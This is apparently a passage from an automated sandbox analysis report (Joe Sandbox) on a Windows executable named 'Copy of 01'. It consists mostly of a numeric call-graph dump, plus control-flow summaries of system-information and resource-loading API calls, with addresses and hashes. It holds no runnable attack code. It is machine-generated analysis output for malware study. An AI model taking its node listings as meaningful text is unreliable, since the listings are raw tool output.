96837 334c6d 22 API calls 96837->96838 96838->96819 96838->96837 96953 3349bd 22 API calls __fread_nolock 96838->96953 96840->96562 96842 39d7d8 96841->96842 96843 39d7dd 96842->96843 96844 39d7f3 96842->96844 96846 39d7ee 96843->96846 96848 33a8c7 22 API calls 96843->96848 96845 33a961 22 API calls 96844->96845 96847 39d7fb 96845->96847 96846->96584 96849 33a961 22 API calls 96847->96849 96848->96846 96850 39d803 96849->96850 96851 33a961 22 API calls 96850->96851 96852 39d80e 96851->96852 96853 33a961 22 API calls 96852->96853 96854 39d816 96853->96854 96855 33a961 22 API calls 96854->96855 96856 39d81e 96855->96856 96857 33a961 22 API calls 96856->96857 96858 39d826 96857->96858 96859 33a961 22 API calls 96858->96859 96860 39d82e 96859->96860 96861 33a961 22 API calls 96860->96861 96862 39d836 96861->96862 96863 33525f 22 API calls 96862->96863 96864 39d84d 96863->96864 96865 33525f 22 API calls 96864->96865 96866 39d866 96865->96866 96867 334c6d 22 API calls 96866->96867 96868 39d872 96867->96868 96869 39d885 96868->96869 96870 3393b2 22 API calls 96868->96870 96871 334c6d 22 API calls 96869->96871 96870->96869 96872 39d88e 96871->96872 96873 39d89e 96872->96873 96874 3393b2 22 API calls 96872->96874 96875 39d8b0 96873->96875 96876 33a8c7 22 API calls 96873->96876 96874->96873 96877 336350 22 API calls 96875->96877 96876->96875 96878 39d8bb 96877->96878 96954 39d978 22 API calls 96878->96954 96880 39d8ca 96955 39d978 22 API calls 96880->96955 96882 39d8dd 96883 334c6d 22 API calls 96882->96883 96884 39d8e7 96883->96884 96885 39d8ec 96884->96885 96886 39d8fe 96884->96886 96887 3333c6 22 API calls 96885->96887 96888 334c6d 22 API calls 96886->96888 96894 39d8f9 96887->96894 96889 39d907 96888->96889 96890 39d925 96889->96890 96891 3333c6 22 API calls 96889->96891 96893 336350 22 API calls 96890->96893 96891->96894 96892 336350 22 API calls 96892->96890 96893->96846 96894->96892 96896 3a2954 __wsopen_s 96895->96896 96897 34fe0b 22 API calls 96896->96897 96898 
3a2971 96897->96898 96899 335722 22 API calls 96898->96899 96900 3a297b 96899->96900 96901 3a274e 27 API calls 96900->96901 96902 3a2986 96901->96902 96903 33511f 64 API calls 96902->96903 96904 3a299b 96903->96904 96905 3a29bf 96904->96905 96906 3a2a6c 96904->96906 96907 3a2e66 75 API calls 96905->96907 96908 3a2e66 75 API calls 96906->96908 96909 3a29c4 96907->96909 96910 3a2a38 96908->96910 96914 3a2a75 ISource 96909->96914 96960 35d583 26 API calls 96909->96960 96912 3350f5 40 API calls 96910->96912 96910->96914 96913 3a2a91 96912->96913 96915 3350f5 40 API calls 96913->96915 96914->96587 96917 3a2aa1 96915->96917 96916 3a29ed 96961 35d583 26 API calls 96916->96961 96918 3350f5 40 API calls 96917->96918 96920 3a2abc 96918->96920 96921 3350f5 40 API calls 96920->96921 96922 3a2acc 96921->96922 96923 3350f5 40 API calls 96922->96923 96924 3a2ae7 96923->96924 96925 3350f5 40 API calls 96924->96925 96926 3a2af7 96925->96926 96927 3350f5 40 API calls 96926->96927 96928 3a2b07 96927->96928 96929 3350f5 40 API calls 96928->96929 96930 3a2b17 96929->96930 96956 3a3017 GetTempPathW GetTempFileNameW 96930->96956 96932 3a2b22 96933 35e5eb 29 API calls 96932->96933 96944 3a2b33 96933->96944 96934 3a2bed 96935 35e678 67 API calls 96934->96935 96936 3a2bf8 96935->96936 96938 3a2bfe DeleteFileW 96936->96938 96939 3a2c12 96936->96939 96937 3350f5 40 API calls 96937->96944 96938->96914 96940 3a2c91 CopyFileW 96939->96940 96946 3a2c18 96939->96946 96941 3a2cb9 DeleteFileW 96940->96941 96942 3a2ca7 DeleteFileW 96940->96942 96957 3a2fd8 CreateFileW 96941->96957 96942->96914 96944->96914 96944->96934 96944->96937 96945 35dbb3 65 API calls 96944->96945 96945->96944 96947 3a22ce 79 API calls 96946->96947 96948 3a2c7c 96947->96948 96948->96941 96949 3a2c80 DeleteFileW 96948->96949 96949->96914 96950->96517 96951->96552 96952->96565 96953->96838 96954->96880 96955->96882 96956->96932 96960->96916 96961->96910 96962 383f75 96963 34ceb1 23 API calls 96962->96963 96964 383f8b 96963->96964 
96965 384006 96964->96965 97031 34e300 23 API calls 96964->97031 96973 33bf40 96965->96973 96969 384052 96971 384a88 96969->96971 97033 3a359c 82 API calls __wsopen_s 96969->97033 96970 383fe6 96970->96969 97032 3a1abf 22 API calls 96970->97032 97034 33adf0 96973->97034 96975 33bf9d 96976 33bfa9 96975->96976 96977 3804b6 96975->96977 96979 3804c6 96976->96979 96980 33c01e 96976->96980 97053 3a359c 82 API calls __wsopen_s 96977->97053 97054 3a359c 82 API calls __wsopen_s 96979->97054 97039 33ac91 96980->97039 96984 33c7da 96988 34fe0b 22 API calls 96984->96988 96985 397120 22 API calls 97001 33c039 ISource __fread_nolock 96985->97001 96997 33c808 __fread_nolock 96988->96997 96990 3804f5 96993 38055a 96990->96993 97055 34d217 239 API calls 96990->97055 97014 33c603 96993->97014 97056 3a359c 82 API calls __wsopen_s 96993->97056 96994 33ec40 239 API calls 96994->97001 96995 34fe0b 22 API calls 97002 33c350 ISource __fread_nolock 96995->97002 96996 33af8a 22 API calls 96996->97001 96997->96995 96998 38091a 97066 3a3209 23 API calls 96998->97066 97001->96984 97001->96985 97001->96990 97001->96993 97001->96994 97001->96996 97001->96997 97001->96998 97003 3808a5 97001->97003 97004 33c237 97001->97004 97008 380591 97001->97008 97009 3808f6 97001->97009 97001->97014 97019 34fddb 22 API calls 97001->97019 97024 3809bf 97001->97024 97026 33bbe0 40 API calls 97001->97026 97029 34fe0b 22 API calls 97001->97029 97043 33ad81 97001->97043 97058 397099 22 API calls __fread_nolock 97001->97058 97059 3b5745 54 API calls _wcslen 97001->97059 97060 34aa42 22 API calls ISource 97001->97060 97061 39f05c 40 API calls 97001->97061 97062 33a993 41 API calls 97001->97062 97063 33aceb 23 API calls ISource 97001->97063 97030 33c3ac 97002->97030 97052 34ce17 22 API calls ISource 97002->97052 97005 33ec40 239 API calls 97003->97005 97016 33c253 97004->97016 97017 33a8c7 22 API calls 97004->97017 97007 3808cf 97005->97007 97007->97014 97064 33a81b 41 API calls 97007->97064 97057 3a359c 82 API 
calls __wsopen_s 97008->97057 97065 3a359c 82 API calls __wsopen_s 97009->97065 97014->96969 97018 380976 97016->97018 97022 33c297 ISource 97016->97022 97017->97016 97067 33aceb 23 API calls ISource 97018->97067 97019->97001 97022->97024 97050 33aceb 23 API calls ISource 97022->97050 97024->97014 97068 3a359c 82 API calls __wsopen_s 97024->97068 97025 33c335 97025->97024 97027 33c342 97025->97027 97026->97001 97051 33a704 22 API calls ISource 97027->97051 97029->97001 97030->96969 97031->96970 97032->96965 97033->96971 97035 33ae01 97034->97035 97038 33ae1c ISource 97034->97038 97036 33aec9 22 API calls 97035->97036 97037 33ae09 CharUpperBuffW 97036->97037 97037->97038 97038->96975 97040 33acae 97039->97040 97041 33acd1 97040->97041 97069 3a359c 82 API calls __wsopen_s 97040->97069 97041->97001 97044 33ad92 97043->97044 97045 37fadb 97043->97045 97046 34fddb 22 API calls 97044->97046 97047 33ad99 97046->97047 97070 33adcd 97047->97070 97050->97025 97051->97002 97052->97002 97053->96979 97054->97014 97055->96993 97056->97014 97057->97014 97058->97001 97059->97001 97060->97001 97061->97001 97062->97001 97063->97001 97064->97009 97065->97014 97066->97004 97067->97024 97068->97014 97069->97041 97073 33addd 97070->97073 97071 33adb6 97071->97001 97072 34fddb 22 API calls 97072->97073 97073->97071 97073->97072 97074 33a961 22 API calls 97073->97074 97075 33a8c7 22 API calls 97073->97075 97076 33adcd 22 API calls 97073->97076 97074->97073 97075->97073 97076->97073 97077 3503fb 97078 350407 ___DestructExceptionObject 97077->97078 97106 34feb1 97078->97106 97080 35040e 97081 350561 97080->97081 97085 350438 97080->97085 97133 35083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97081->97133 97083 350568 97134 354e52 28 API calls _abort 97083->97134 97092 350477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97085->97092 97117 36247d 97085->97117 97086 35056e 97135 354e04 28 API calls 
_abort 97086->97135 97090 350576 97091 350457 97094 3504d8 97092->97094 97129 354e1a 38 API calls 2 library calls 97092->97129 97125 350959 97094->97125 97097 3504de 97098 3504f3 97097->97098 97130 350992 GetModuleHandleW 97098->97130 97100 3504fa 97100->97083 97101 3504fe 97100->97101 97102 350507 97101->97102 97131 354df5 28 API calls _abort 97101->97131 97132 350040 13 API calls 2 library calls 97102->97132 97105 35050f 97105->97091 97107 34feba 97106->97107 97136 350698 IsProcessorFeaturePresent 97107->97136 97109 34fec6 97137 352c94 10 API calls 3 library calls 97109->97137 97111 34fecb 97112 34fecf 97111->97112 97138 362317 97111->97138 97112->97080 97115 34fee6 97115->97080 97120 362494 97117->97120 97118 350a8c _ValidateLocalCookies 5 API calls 97119 350451 97118->97119 97119->97091 97121 362421 97119->97121 97120->97118 97122 362450 97121->97122 97123 350a8c _ValidateLocalCookies 5 API calls 97122->97123 97124 362479 97123->97124 97124->97092 97189 352340 97125->97189 97128 35097f 97128->97097 97129->97094 97130->97100 97131->97102 97132->97105 97133->97083 97134->97086 97135->97090 97136->97109 97137->97111 97142 36d1f6 97138->97142 97141 352cbd 8 API calls 3 library calls 97141->97112 97145 36d213 97142->97145 97146 36d20f 97142->97146 97143 350a8c _ValidateLocalCookies 5 API calls 97144 34fed8 97143->97144 97144->97115 97144->97141 97145->97146 97148 364bfb 97145->97148 97146->97143 97149 364c07 ___DestructExceptionObject 97148->97149 97160 362f5e EnterCriticalSection 97149->97160 97151 364c0e 97161 3650af 97151->97161 97153 364c1d 97159 364c2c 97153->97159 97174 364a8f 29 API calls 97153->97174 97156 364c27 97175 364b45 GetStdHandle GetFileType 97156->97175 97157 364c3d __wsopen_s 97157->97145 97176 364c48 LeaveCriticalSection _abort 97159->97176 97160->97151 97162 3650bb ___DestructExceptionObject 97161->97162 97163 3650df 97162->97163 97164 3650c8 97162->97164 97177 362f5e EnterCriticalSection 97163->97177 97185 35f2d9 20 API calls _abort 
97164->97185 97167 3650cd 97186 3627ec 26 API calls _abort 97167->97186 97169 3650d7 __wsopen_s 97169->97153 97170 365117 97187 36513e LeaveCriticalSection _abort 97170->97187 97173 3650eb 97173->97170 97178 365000 97173->97178 97174->97156 97175->97159 97176->97157 97177->97173 97179 364c7d _abort 20 API calls 97178->97179 97181 365012 97179->97181 97180 36501f 97182 3629c8 _free 20 API calls 97180->97182 97181->97180 97188 363405 11 API calls 2 library calls 97181->97188 97184 365071 97182->97184 97184->97173 97185->97167 97186->97169 97187->97169 97188->97181 97190 35096c GetStartupInfoW 97189->97190 97190->97128 97191 332de3 97192 332df0 __wsopen_s 97191->97192 97193 332e09 97192->97193 97194 372c2b ___scrt_fastfail 97192->97194 97195 333aa2 23 API calls 97193->97195 97197 372c47 GetOpenFileNameW 97194->97197 97196 332e12 97195->97196 97207 332da5 97196->97207 97198 372c96 97197->97198 97200 336b57 22 API calls 97198->97200 97202 372cab 97200->97202 97202->97202 97204 332e27 97225 3344a8 97204->97225 97208 371f50 __wsopen_s 97207->97208 97209 332db2 GetLongPathNameW 97208->97209 97210 336b57 22 API calls 97209->97210 97211 332dda 97210->97211 97212 333598 97211->97212 97213 33a961 22 API calls 97212->97213 97214 3335aa 97213->97214 97215 333aa2 23 API calls 97214->97215 97216 3335b5 97215->97216 97217 3335c0 97216->97217 97221 3732eb 97216->97221 97218 33515f 22 API calls 97217->97218 97220 3335cc 97218->97220 97254 3335f3 97220->97254 97222 37330d 97221->97222 97260 34ce60 41 API calls 97221->97260 97224 3335df 97224->97204 97226 334ecb 94 API calls 97225->97226 97227 3344cd 97226->97227 97228 373833 97227->97228 97229 334ecb 94 API calls 97227->97229 97230 3a2cf9 80 API calls 97228->97230 97231 3344e1 97229->97231 97232 373848 97230->97232 97231->97228 97233 3344e9 97231->97233 97234 37384c 97232->97234 97235 373869 97232->97235 97238 373854 97233->97238 97239 3344f5 97233->97239 97236 334f39 68 API calls 97234->97236 97237 34fe0b 22 API calls 97235->97237 
97236->97238 97244 3738ae 97237->97244 97262 39da5a 82 API calls 97238->97262 97261 33940c 136 API calls 2 library calls 97239->97261 97242 373862 97242->97235 97243 332e31 97245 373a5f 97244->97245 97251 339cb3 22 API calls 97244->97251 97263 39967e 22 API calls __fread_nolock 97244->97263 97264 3995ad 42 API calls _wcslen 97244->97264 97265 3a0b5a 22 API calls 97244->97265 97266 33a4a1 22 API calls __fread_nolock 97244->97266 97267 333ff7 22 API calls 97244->97267 97246 334f39 68 API calls 97245->97246 97268 39989b 82 API calls __wsopen_s 97245->97268 97246->97245 97251->97244 97255 333605 97254->97255 97259 333624 __fread_nolock 97254->97259 97258 34fe0b 22 API calls 97255->97258 97256 34fddb 22 API calls 97257 33363b 97256->97257 97257->97224 97258->97259 97259->97256 97260->97221 97261->97243 97262->97242 97263->97244 97264->97244 97265->97244 97266->97244 97267->97244 97268->97245 97269 372ba5 97270 332b25 97269->97270 97271 372baf 97269->97271 97297 332b83 7 API calls 97270->97297 97273 333a5a 24 API calls 97271->97273 97275 372bb8 97273->97275 97277 339cb3 22 API calls 97275->97277 97279 372bc6 97277->97279 97278 332b2f 97282 333837 49 API calls 97278->97282 97287 332b44 97278->97287 97280 372bf5 97279->97280 97281 372bce 97279->97281 97283 3333c6 22 API calls 97280->97283 97284 3333c6 22 API calls 97281->97284 97282->97287 97295 372bf1 GetForegroundWindow ShellExecuteW 97283->97295 97285 372bd9 97284->97285 97286 336350 22 API calls 97285->97286 97289 372be7 97286->97289 97292 332b5f 97287->97292 97301 3330f2 Shell_NotifyIconW ___scrt_fastfail 97287->97301 97293 3333c6 22 API calls 97289->97293 97291 372c26 97291->97292 97294 332b66 SetCurrentDirectoryW 97292->97294 97293->97295 97296 332b7a 97294->97296 97295->97291 97302 332cd4 7 API calls 97297->97302 97299 332b2a 97300 332c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97299->97300 97300->97278 97301->97292 97302->97299 97303 368402 97308 3681be 97303->97308 97307 36842a 97313 3681ef 
try_get_first_available_module 97308->97313 97310 3683ee 97327 3627ec 26 API calls _abort 97310->97327 97312 368343 97312->97307 97320 370984 97312->97320 97316 368338 97313->97316 97323 358e0b 40 API calls 2 library calls 97313->97323 97315 36838c 97315->97316 97324 358e0b 40 API calls 2 library calls 97315->97324 97316->97312 97326 35f2d9 20 API calls _abort 97316->97326 97318 3683ab 97318->97316 97325 358e0b 40 API calls 2 library calls 97318->97325 97328 370081 97320->97328 97322 37099f 97322->97307 97323->97315 97324->97318 97325->97316 97326->97310 97327->97312 97329 37008d ___DestructExceptionObject 97328->97329 97330 37009b 97329->97330 97333 3700d4 97329->97333 97386 35f2d9 20 API calls _abort 97330->97386 97332 3700a0 97387 3627ec 26 API calls _abort 97332->97387 97339 37065b 97333->97339 97338 3700aa __wsopen_s 97338->97322 97389 37042f 97339->97389 97342 3706a6 97407 365221 97342->97407 97343 37068d 97421 35f2c6 20 API calls _abort 97343->97421 97346 3706ab 97347 3706b4 97346->97347 97348 3706cb 97346->97348 97423 35f2c6 20 API calls _abort 97347->97423 97420 37039a CreateFileW 97348->97420 97352 3706b9 97424 35f2d9 20 API calls _abort 97352->97424 97353 370704 97355 370781 GetFileType 97353->97355 97357 370756 GetLastError 97353->97357 97425 37039a CreateFileW 97353->97425 97356 37078c GetLastError 97355->97356 97362 3707d3 97355->97362 97427 35f2a3 20 API calls __dosmaperr 97356->97427 97426 35f2a3 20 API calls __dosmaperr 97357->97426 97360 370692 97422 35f2d9 20 API calls _abort 97360->97422 97361 37079a CloseHandle 97361->97360 97364 3707c3 97361->97364 97429 36516a 21 API calls 2 library calls 97362->97429 97428 35f2d9 20 API calls _abort 97364->97428 97366 370749 97366->97355 97366->97357 97368 3707f4 97369 370840 97368->97369 97430 3705ab 72 API calls 3 library calls 97368->97430 97374 37086d 97369->97374 97431 37014d 72 API calls 4 library calls 97369->97431 97370 3707c8 97370->97360 97373 370866 97373->97374 97375 37087e 97373->97375 97376 
3686ae __wsopen_s 29 API calls 97374->97376 97377 3700f8 97375->97377 97378 3708fc CloseHandle 97375->97378 97376->97377 97388 370121 LeaveCriticalSection __wsopen_s 97377->97388 97432 37039a CreateFileW 97378->97432 97380 370927 97381 37095d 97380->97381 97382 370931 GetLastError 97380->97382 97381->97377 97433 35f2a3 20 API calls __dosmaperr 97382->97433 97384 37093d 97434 365333 21 API calls 2 library calls 97384->97434 97386->97332 97387->97338 97388->97338 97390 37046a 97389->97390 97391 370450 97389->97391 97435 3703bf 97390->97435 97391->97390 97442 35f2d9 20 API calls _abort 97391->97442 97394 37045f 97443 3627ec 26 API calls _abort 97394->97443 97396 3704d1 97405 370524 97396->97405 97446 35d70d 26 API calls 2 library calls 97396->97446 97397 3704a2 97397->97396 97444 35f2d9 20 API calls _abort 97397->97444 97400 37051f 97402 37059e 97400->97402 97400->97405 97401 3704c6 97445 3627ec 26 API calls _abort 97401->97445 97447 3627fc 11 API calls _abort 97402->97447 97405->97342 97405->97343 97406 3705aa 97408 36522d ___DestructExceptionObject 97407->97408 97450 362f5e EnterCriticalSection 97408->97450 97410 365234 97411 365259 97410->97411 97416 3652c7 EnterCriticalSection 97410->97416 97418 36527b 97410->97418 97413 365000 __wsopen_s 21 API calls 97411->97413 97415 36525e 97413->97415 97414 3652a4 __wsopen_s 97414->97346 97415->97418 97454 365147 EnterCriticalSection 97415->97454 97417 3652d4 LeaveCriticalSection 97416->97417 97416->97418 97417->97410 97451 36532a 97418->97451 97420->97353 97421->97360 97422->97377 97423->97352 97424->97360 97425->97366 97426->97360 97427->97361 97428->97370 97429->97368 97430->97369 97431->97373 97432->97380 97433->97384 97434->97381 97436 3703d7 97435->97436 97439 3703f2 97436->97439 97448 35f2d9 20 API calls _abort 97436->97448 97438 370416 97449 3627ec 26 API calls _abort 97438->97449 97439->97397 97441 370421 97441->97397 97442->97394 97443->97390 97444->97401 97445->97396 97446->97400 97447->97406 97448->97438 
97449->97441 97450->97410 97455 362fa6 LeaveCriticalSection 97451->97455 97453 365331 97453->97414 97454->97418 97455->97453 97456 336a26 97457 34fddb 22 API calls 97456->97457 97458 336a33 97457->97458 97459 331044 97464 3310f3 97459->97464 97461 33104a 97500 3500a3 29 API calls __onexit 97461->97500 97463 331054 97501 331398 97464->97501 97468 33116a 97469 33a961 22 API calls 97468->97469 97470 331174 97469->97470 97471 33a961 22 API calls 97470->97471 97472 33117e 97471->97472 97473 33a961 22 API calls 97472->97473 97474 331188 97473->97474 97475 33a961 22 API calls 97474->97475 97476 3311c6 97475->97476 97477 33a961 22 API calls 97476->97477 97478 331292 97477->97478 97511 33171c 97478->97511 97482 3312c4 97483 33a961 22 API calls 97482->97483 97484 3312ce 97483->97484 97485 341940 9 API calls 97484->97485 97486 3312f9 97485->97486 97532 331aab 97486->97532 97488 331315 97489 331325 GetStdHandle 97488->97489 97490 372485 97489->97490 97491 33137a 97489->97491 97490->97491 97492 37248e 97490->97492 97494 331387 OleInitialize 97491->97494 97493 34fddb 22 API calls 97492->97493 97495 372495 97493->97495 97494->97461 97539 3a011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97495->97539 97497 37249e 97540 3a0944 CreateThread 97497->97540 97499 3724aa CloseHandle 97499->97491 97500->97463 97541 3313f1 97501->97541 97504 3313f1 22 API calls 97505 3313d0 97504->97505 97506 33a961 22 API calls 97505->97506 97507 3313dc 97506->97507 97508 336b57 22 API calls 97507->97508 97509 331129 97508->97509 97510 331bc3 6 API calls 97509->97510 97510->97468 97512 33a961 22 API calls 97511->97512 97513 33172c 97512->97513 97514 33a961 22 API calls 97513->97514 97515 331734 97514->97515 97516 33a961 22 API calls 97515->97516 97517 33174f 97516->97517 97518 34fddb 22 API calls 97517->97518 97519 33129c 97518->97519 97520 331b4a 97519->97520 97521 331b58 97520->97521 97522 33a961 22 API calls 97521->97522 97523 331b63 
97522->97523 97524 33a961 22 API calls 97523->97524 97525 331b6e 97524->97525 97526 33a961 22 API calls 97525->97526 97527 331b79 97526->97527 97528 33a961 22 API calls 97527->97528 97529 331b84 97528->97529 97530 34fddb 22 API calls 97529->97530 97531 331b96 RegisterWindowMessageW 97530->97531 97531->97482 97533 331abb 97532->97533 97534 37272d 97532->97534 97535 34fddb 22 API calls 97533->97535 97548 3a3209 23 API calls 97534->97548 97537 331ac3 97535->97537 97537->97488 97538 372738 97539->97497 97540->97499 97549 3a092a 28 API calls 97540->97549 97542 33a961 22 API calls 97541->97542 97543 3313fc 97542->97543 97544 33a961 22 API calls 97543->97544 97545 331404 97544->97545 97546 33a961 22 API calls 97545->97546 97547 3313c6 97546->97547 97547->97504 97548->97538 97550 382a00 97564 33d7b0 ISource 97550->97564 97551 33db11 PeekMessageW 97551->97564 97552 33d807 GetInputState 97552->97551 97552->97564 97553 381cbe TranslateAcceleratorW 97553->97564 97555 33db73 TranslateMessage DispatchMessageW 97556 33db8f PeekMessageW 97555->97556 97556->97564 97557 33da04 timeGetTime 97557->97564 97558 33dbaf Sleep 97575 33dbc0 97558->97575 97559 382b74 Sleep 97559->97575 97560 381dda timeGetTime 97613 34e300 23 API calls 97560->97613 97561 34e551 timeGetTime 97561->97575 97564->97551 97564->97552 97564->97553 97564->97555 97564->97556 97564->97557 97564->97558 97564->97559 97564->97560 97566 33d9d5 97564->97566 97578 33ec40 239 API calls 97564->97578 97579 33bf40 239 API calls 97564->97579 97580 341310 239 API calls 97564->97580 97582 33dd50 97564->97582 97589 33dfd0 97564->97589 97612 34edf6 IsDialogMessageW GetClassLongW 97564->97612 97614 3a3a2a 23 API calls 97564->97614 97615 3a359c 82 API calls __wsopen_s 97564->97615 97565 382c0b GetExitCodeProcess 97569 382c21 WaitForSingleObject 97565->97569 97570 382c37 CloseHandle 97565->97570 97567 3c29bf GetForegroundWindow 97567->97575 97569->97564 97569->97570 97570->97575 97571 382a31 97571->97566 97572 382ca9 Sleep 97572->97564 
97575->97561 97575->97564 97575->97565 97575->97566 97575->97567 97575->97571 97575->97572 97616 3b5658 23 API calls 97575->97616 97617 39e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97575->97617 97618 39d4dc 47 API calls 97575->97618 97578->97564 97579->97564 97580->97564 97583 33dd83 97582->97583 97584 33dd6f 97582->97584 97620 3a359c 82 API calls __wsopen_s 97583->97620 97619 33d260 239 API calls 2 library calls 97584->97619 97586 33dd7a 97586->97564 97588 382f75 97588->97588 97590 33e010 97589->97590 97609 33e0dc ISource 97590->97609 97623 350242 5 API calls __Init_thread_wait 97590->97623 97593 382fca 97595 33a961 22 API calls 97593->97595 97593->97609 97594 33a961 22 API calls 97594->97609 97597 382fe4 97595->97597 97624 3500a3 29 API calls __onexit 97597->97624 97601 382fee 97625 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97601->97625 97604 33a8c7 22 API calls 97604->97609 97605 3404f0 22 API calls 97605->97609 97606 33ec40 239 API calls 97606->97609 97607 33e3e1 97607->97564 97608 3a359c 82 API calls 97608->97609 97609->97594 97609->97604 97609->97605 97609->97606 97609->97607 97609->97608 97621 33a81b 41 API calls 97609->97621 97622 34a308 239 API calls 97609->97622 97626 350242 5 API calls __Init_thread_wait 97609->97626 97627 3500a3 29 API calls __onexit 97609->97627 97628 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97609->97628 97629 3b47d4 239 API calls 97609->97629 97630 3b68c1 239 API calls 97609->97630 97612->97564 97613->97564 97614->97564 97615->97564 97616->97575 97617->97575 97618->97575 97619->97586 97620->97588 97621->97609 97622->97609 97623->97593 97624->97601 97625->97609 97626->97609 97627->97609 97628->97609 97629->97609 97630->97609 97631 331cad SystemParametersInfoW

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 234 3342de-33434d call 33a961 GetVersionExW call 336b57 239 373617-37362a 234->239 240 334353 234->240 242 37362b-37362f 239->242 241 334355-334357 240->241 243 373656 241->243 244 33435d-3343bc call 3393b2 call 3337a0 241->244 245 373632-37363e 242->245 246 373631 242->246 250 37365d-373660 243->250 263 3343c2-3343c4 244->263 264 3737df-3737e6 244->264 245->242 247 373640-373642 245->247 246->245 247->241 249 373648-37364f 247->249 249->239 252 373651 249->252 253 373666-3736a8 250->253 254 33441b-334435 GetCurrentProcess IsWow64Process 250->254 252->243 253->254 258 3736ae-3736b1 253->258 256 334437 254->256 257 334494-33449a 254->257 260 33443d-334449 256->260 257->260 261 3736b3-3736bd 258->261 262 3736db-3736e5 258->262 265 373824-373828 GetSystemInfo 260->265 266 33444f-33445e LoadLibraryA 260->266 267 3736bf-3736c5 261->267 268 3736ca-3736d6 261->268 270 3736e7-3736f3 262->270 271 3736f8-373702 262->271 263->250 269 3343ca-3343dd 263->269 272 373806-373809 264->272 273 3737e8 264->273 276 334460-33446e GetProcAddress 266->276 277 33449c-3344a6 GetSystemInfo 266->277 267->254 268->254 278 3343e3-3343e5 269->278 279 373726-37372f 269->279 270->254 281 373715-373721 271->281 282 373704-373710 271->282 274 3737f4-3737fc 272->274 275 37380b-37381a 272->275 280 3737ee 273->280 274->272 275->280 285 37381c-373822 275->285 276->277 286 334470-334474 GetNativeSystemInfo 276->286 287 334476-334478 277->287 288 3343eb-3343ee 278->288 289 37374d-373762 278->289 283 373731-373737 279->283 284 37373c-373748 279->284 280->274 281->254 282->254 283->254 284->254 285->274 286->287 292 334481-334493 287->292 293 33447a-33447b FreeLibrary 287->293 294 373791-373794 288->294 295 3343f4-33440f 288->295 290 373764-37376a 289->290 291 37376f-37377b 289->291 290->254 291->254 293->292 294->254 298 37379a-3737c1 294->298 296 334415 295->296 297 373780-37378c 295->297 296->254 297->254 299 3737c3-3737c9 298->299 300 3737ce-3737da 298->300 
299->254 300->254
                        APIs
                        • GetVersionExW.KERNEL32(?), ref: 0033430D
                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                        • GetCurrentProcess.KERNEL32(?,003CCB64,00000000,?,?), ref: 00334422
                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 00334429
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00334454
                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00334466
                        • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00334474
                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0033447B
                        • GetSystemInfo.KERNEL32(?,?,?), ref: 003344A0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                        • API String ID: 3290436268-3101561225
                        • Opcode ID: 4d0d03470150862beeac6b7e1cf87356d5eab0abcfba59b1b0ab6dd7f884f421
                        • Instruction ID: 6330e2413d45885af5e8023fbe68d421b5665a6b92e2d8e15fde8dc79b87d354
                        • Opcode Fuzzy Hash: 4d0d03470150862beeac6b7e1cf87356d5eab0abcfba59b1b0ab6dd7f884f421
                        • Instruction Fuzzy Hash: 5FA1B87192A2C0DFE727C76A7EC15957FE87B26300F0894B9E885F3A32D2345914DB29

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1378 3342a2-3342ba CreateStreamOnHGlobal 1379 3342da-3342dd 1378->1379 1380 3342bc-3342d3 FindResourceExW 1378->1380 1381 3342d9 1380->1381 1382 3735ba-3735c9 LoadResource 1380->1382 1381->1379 1382->1381 1383 3735cf-3735dd SizeofResource 1382->1383 1383->1381 1384 3735e3-3735ee LockResource 1383->1384 1384->1381 1385 3735f4-373612 1384->1385 1385->1381
                        APIs
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003350AA,?,?,00000000,00000000), ref: 003342B2
                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,003350AA,?,?,00000000,00000000), ref: 003342C9
                        • LoadResource.KERNEL32(?,00000000,?,?,003350AA,?,?,00000000,00000000,?,?,?,?,?,?,00334F20), ref: 003735BE
                        • SizeofResource.KERNEL32(?,00000000,?,?,003350AA,?,?,00000000,00000000,?,?,?,?,?,?,00334F20), ref: 003735D3
                        • LockResource.KERNEL32(003350AA,?,?,003350AA,?,?,00000000,00000000,?,?,?,?,?,?,00334F20,?), ref: 003735E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
